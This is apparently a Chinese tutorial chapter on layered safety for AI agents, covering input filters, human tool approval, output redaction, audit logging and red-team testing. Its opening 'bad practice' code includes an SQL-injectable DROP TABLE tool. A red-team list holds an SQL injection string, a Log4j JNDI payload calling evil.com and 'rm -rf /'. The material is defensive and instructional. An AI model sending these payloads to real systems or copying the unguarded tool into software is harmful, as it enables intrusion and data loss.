跳转至

Item 31: Design Safety as Layered Defense, Not a Single Check

问题

你只做了一层安全检查,以为就够了:

# 坏做法:只有一层检查
class UnsafeAgent:
    def run(self, user_input: str):
        if "删除" in user_input:
            return "禁止"
        # 如果绕过这个检查,就完全暴露了
        return self.execute_dangerous_tool(user_input)

或者你根本没有安全意识:

# 危险:没有安全检查
@tool
def delete_database(table_name: str):
    """删除数据库表"""
    db.execute(f"DROP TABLE {table_name}")
    return "Deleted"

# 任何用户输入都能调用这个工具!

深入解释

安全不是单一检查,而是多层护盾

┌─────────────────────────────────────────────────────────────┐
│                    分层安全模型                              │
├─────────────────────────────────────────────────────────────┤
│                                                              │
│  用户输入                                                    │
│      ↓                                                       │
│  ┌─────────────────────────────────────────────────────┐    │
│  │  Layer 1: 输入过滤(Input Validation)                 │    │
│  │  - 敏感词过滤                                        │    │
│  │  - 注入检测                                          │    │
│  │  - 速率限制                                          │    │
│  └─────────────────────────────────────────────────────┘    │
│      ↓                                                       │
│  ┌─────────────────────────────────────────────────────┐    │
│  │  Layer 2: 工具审批(Tool Approval)                    │    │
│  │  - 高风险工具需要人工审批                              │    │
│  │  - 权限分级                                          │    │
│  │  - 操作审计                                          │    │
│  └─────────────────────────────────────────────────────┘    │
│      ↓                                                       │
│  ┌─────────────────────────────────────────────────────┐    │
│  │  Layer 3: 输出审核(Output Filtering)                  │    │
│  │  - 有害内容过滤                                       │    │
│  │  - 敏感信息脱敏                                       │    │
│  │  - 合规检查                                          │    │
│  └─────────────────────────────────────────────────────┘    │
│      ↓                                                       │
│  最终响应                                                    │
│                                                              │
└─────────────────────────────────────────────────────────────┘

心智模型:安全就像现实世界的安保系统——机场有层层安检(金属探测器、X光、身份核验),单一检查被突破不等于整个系统被突破。

推荐做法

Layer 1: 输入过滤 Middleware

from agent_framework import Middleware

class InputSafetyMiddleware(Middleware):
    """输入安全检查"""

    BLOCKED_PATTERNS = [
        "删除",
        "drop table",
        "rm -rf",
        "format:",
        "--",
    ]

    def __init__(self, blocked_patterns: list[str] = None):
        self.blocked_patterns = blocked_patterns or self.BLOCKED_PATTERNS

    async def on_input(self, input_data, context):
        """在 Agent 处理前检查输入"""
        text = str(input_data)

        for pattern in self.blocked_patterns:
            if pattern.lower() in text.lower():
                raise ValueError(f"输入包含敏感内容: {pattern}")

        return input_data  # 通过检查,继续


class RateLimitMiddleware(Middleware):
    """速率限制"""

    def __init__(self, max_requests_per_minute: int = 60):
        self.max_requests = max_requests_per_minute
        self.requests = []

    async def on_input(self, input_data, context):
        now = time.time()
        self.requests = [t for t in self.requests if now - t < 60]

        if len(self.requests) >= self.max_requests:
            raise ValueError("请求过于频繁,请稍后重试")

        self.requests.append(now)
        return input_data

Layer 2: 工具审批

from agent_framework import tool, ToolApproval

# 高风险工具需要审批
@tool
def delete_database(table_name: str) -> str:
    """删除数据库表(高风险操作)"""
    # 不直接执行,而是返回待审批状态
    return f"DELETE_REQUEST_PENDING: {table_name}"

# 配置工具审批
class HumanApprovalMiddleware(Middleware):
    """人工审批中间件"""

    def __init__(self, approver):
        self.approver = approver  # 可以是 email、Slack webhook 等

    async def on_tool_call(self, tool_name: str, args: dict, context):
        high_risk_tools = ["delete_database", "send_email", "transfer_money"]

        if tool_name in high_risk_tools:
            # 发送审批请求
            approval_id = self.approver.request_approval(
                tool=tool_name,
                args=args,
                user=context.user_id,
            )

            # 等待审批(可以是异步的)
            if not self.approver.wait_for_approval(approval_id, timeout=300):
                raise ValueError(f"工具 {tool_name} 审批超时或被拒绝")

        return args  # 返回参数继续执行

Layer 3: 输出审核

class OutputSafetyMiddleware(Middleware):
    """输出安全检查"""

    SENSITIVE_PATTERNS = [
        r"\d{15,18}",  # 身份证号
        r"\d{16,19}",  # 信用卡号
        r"sk-[a-zA-Z0-9]{20,}",  # API Key
    ]

    def __init__(self, patterns: list[str] = None):
        self.patterns = patterns or self.SENSITIVE_PATTERNS

    async def on_output(self, output, context):
        """在输出返回用户前检查"""
        text = str(output)

        for pattern in self.patterns:
            import re
            if re.search(pattern, text):
                # 脱敏处理
                text = re.sub(pattern, "[脱敏]", text)

        return text


class ContentFilterMiddleware(Middleware):
    """内容过滤"""

    HARMFUL_KEYWORDS = [
        "如何制造炸弹",
        "怎么入侵别人电脑",
        # ... 更多敏感词
    ]

    async def on_output(self, output, context):
        text = str(output)

        for keyword in self.HARMFUL_KEYWORDS:
            if keyword in text:
                return "抱歉,我无法回答这个问题。"

        return output

完整分层安全 Agent

# 组合多层安全
agent = Agent(
    client=client,
    instructions="你是一个有帮助的助手。",
    tools=[delete_database, send_email, calculate],
    middleware=[
        InputSafetyMiddleware(),           # Layer 1
        RateLimitMiddleware(max_requests=60),  # Layer 1
        HumanApprovalMiddleware(approver),  # Layer 2
        OutputSafetyMiddleware(),          # Layer 3
        ContentFilterMiddleware(),          # Layer 3
    ],
)

好 vs 坏对比

# 坏做法:只有一层检查
@tool
def dangerous_tool(input):
    if "bad" in input:  # 一层,容易绕过
        return "blocked"
    execute_dangerous_operation(input)

# 好做法:多层防御
@tool
def dangerous_tool(input):
    # Layer 1: 工具级别检查
    if contains_dangerous_pattern(input):
        return "blocked at tool level"

# Layer 2: Middleware 检查
# Layer 3: 审批流程检查

扩展讨论

安全层级设计

层级 机制 作用
Layer 0 Client 基础验证 API Key、认证
Layer 1 输入验证 注入、格式、长度
Layer 2 业务规则 权限、审批
Layer 3 输出验证 脱敏、过滤
Layer 4 审计 日志、追溯

审计日志

class AuditLogger:
    """安全审计日志"""

    def log_tool_call(self, tool_name: str, args: dict, user: str, approved: bool):
        entry = {
            "timestamp": datetime.now().isoformat(),
            "event": "tool_call",
            "tool": tool_name,
            "args": args,
            "user": user,
            "approved": approved,
        }
        # 写入不可篡改的审计日志(如 append-only 文件、数据库)
        self.audit_log.append(entry)

    def log_input_blocked(self, input_text: str, reason: str, user: str):
        entry = {
            "timestamp": datetime.now().isoformat(),
            "event": "input_blocked",
            "input": input_text[:200],  # 只记录前200字符
            "reason": reason,
            "user": user,
        }
        self.audit_log.append(entry)

    def log_output_filtered(self, original: str, reason: str):
        entry = {
            "timestamp": datetime.now().isoformat(),
            "event": "output_filtered",
            "original": original[:200],
            "reason": reason,
        }
        self.audit_log.append(entry)

人工介入机制

class SlackApprover:
    """Slack 审批"""

    def __init__(self, webhook_url: str):
        self.webhook_url = webhook_url

    def request_approval(self, tool: str, args: dict, user: str) -> str:
        import uuid
        approval_id = str(uuid.uuid4())

        message = {
            "text": f"工具执行审批请求",
            "blocks": [
                {"type": "section", "text": {"type": "mrkdwn", "text": f"*工具*: {tool}"}},
                {"type": "section", "text": {"type": "mrkdwn", "text": f"*申请人*: {user}"}},
                {"type": "section", "text": {"type": "mrkdwn", "text": f"*参数*: {args}"}},
                {"type": "actions", "elements": [
                    {"type": "button", "text": {"type": "plain_text", "text": "批准"}, "action_id": f"approve_{approval_id}"},
                    {"type": "button", "text": {"type": "plain_text", "text": "拒绝"}, "action_id": f"reject_{approval_id}"},
                ]},
            ]
        }

        requests.post(self.webhook_url, json=message)
        return approval_id

红队测试

# 定期进行安全测试
class RedTeamTester:
    ATTACK_PATTERNS = [
        "'; DROP TABLE users;--",  # SQL 注入
        "${jndi:ldap://evil.com/a}",  # Log4j
        "rm -rf /",  # 系统命令注入
        # ... 更多攻击模式
    ]

    async def run_tests(self, agent):
        for pattern in self.ATTACK_PATTERNS:
            try:
                result = await agent.run(pattern)
                if not self.is_safe_response(result):
                    print(f"VULNERABILITY: {pattern} bypassed security")
            except Exception as e:
                print(f"BLOCKED: {pattern} - {e}")

Things to Remember

  • 安全必须分层,单一检查不可靠
  • Layer 1(输入):过滤、验证、速率限制
  • Layer 2(工具):审批、权限、隔离
  • Layer 3(输出):脱敏、过滤、合规
  • 每层都可能失败,层与层之间要互补
  • 高风险工具必须人工审批,不能自动执行
  • 审计日志用于事后分析,必须不可篡改
  • 不要信任任何用户输入,即使通过了前面的检查
  • 失败策略:安全检查失败时应该 fail-close(默认拒绝)而非 fail-open(默认通过)
  • 人工介入是最高权限的安全护盾